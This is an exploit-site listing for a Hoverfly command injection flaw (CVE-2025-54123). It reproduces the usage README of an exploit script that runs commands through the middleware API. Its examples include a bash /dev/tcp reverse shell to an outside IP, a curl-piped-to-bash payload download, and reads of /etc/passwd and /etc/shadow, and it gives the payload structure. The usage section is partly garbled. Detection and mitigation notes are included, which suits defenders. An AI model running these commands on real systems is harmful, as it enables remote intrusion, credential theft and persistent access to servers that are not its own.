Exploit for OS Command Injection in Hoverfly CVE-2025-54123

Name: Exploit for OS Command Injection in Hoverfly CVE-2025-54123
Rating: 5 (243 reviews)
2026-03-28 | CVSS 9.8
## https://sploitus.com/exploit?id=7D2225D0-B40A-5995-9A58-ABE3114FC271
# CVE-2025-54123 Exploit

Hoverfly Authenticated Middleware Command Injection RCE | CVSS 9.8 CRITICAL

## Vulnerability

Hoverfly  -u  -p  -c  [--shell SHELL]
```

- `-t, --target` - Hoverfly API endpoint (required)
- `-u, --username` - Admin username (required)
- `-p, --password` - Admin password (required)
- `-c, --command` - Command to execute (required)
- `--shell` - Shell binary to use (default: /bin/bash)

## Examples
```bash
# Basic command execution
python3 exploit.py -t http://localhost:8888 -u admin -p password -c whoami

# Read sensitive files
python3 exploit.py -t http://10.10.11.100:8888 -u admin -p pass123 -c "cat /etc/passwd"

# Reverse shell
python3 exploit.py -t http://target:8888 -u user -p secret -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"

# Multi-command execution
python3 exploit.py -t http://192.168.1.50:8888 -u admin -p admin -c "id; uname -a; pwd"

# Use different shell
python3 exploit.py -t http://victim:8888 -u root -p toor -c "cat /etc/shadow" --shell /bin/sh

# Download and execute payload
python3 exploit.py -t http://target:8888 -u admin -p pass -c "curl http://10.10.14.5/shell.sh | bash"
```

## Attack Flow

1. Attacker authenticates with valid admin credentials (Basic Auth)
2. Sends PUT request to `/api/v2/hoverfly/middleware` with malicious payload
3. Hoverfly writes script to temporary file `/tmp/hoverfly_`
4. During validation, executes: ` /tmp/hoverfly_`
5. Command output returned in error response STDOUT section
6. Exploit extracts and displays output

## Payload Structure
```json
{
    "binary": "/bin/bash",
    "script": "whoami"
}
```

HTTP headers include:
```
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Content-Type: application/json
```

## Impact

- **Full Remote Code Execution** with Hoverfly process privileges
- **Credential Theft** - steal API keys, tokens, secrets
- **Internal Network Pivot** - compromise adjacent systems
- **Data Exfiltration** - access simulation data, configurations
- **Persistence** - install backdoors, maintain access
- **Service Disruption** - modify/delete middleware configs

## Vulnerable Code Locations

- `core/middleware/middleware.go:94-96` - No input validation on binary parameter
- `core/middleware/local_middleware.go:14-19` - Unsafe exec.Command() usage
- `core/hoverfly_service.go:173` - Immediate execution during validation

## Affected Versions

- Hoverfly <= 1.11.3
- All installations with Admin API accessible and authentication enabled

## Detection

Look for:
- PUT requests to `/api/v2/hoverfly/middleware`
- Error responses containing "STDOUT:" with command output
- Temporary files in `/tmp/hoverfly/`
- Unusual process executions from hoverfly service

## Mitigation

- Upgrade to patched version (if available)
- Restrict Admin API access to trusted IPs only
- Use strong authentication credentials
- Monitor `/api/v2/hoverfly/middleware` endpoint access
- Implement input validation on binary/script parameters

## References

- CVE-2025-54123
- CWE-78 (OS Command Injection)
- CWE-20 (Improper Input Validation)
- GHSA-r4h8-hfp2-ggmf
- https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf
- https://nvd.nist.gov/vuln/detail/CVE-2025-54123

## Credits

Original discovery: [@Kr1shna4garwal](https://github.com/Kr1shna4garwal)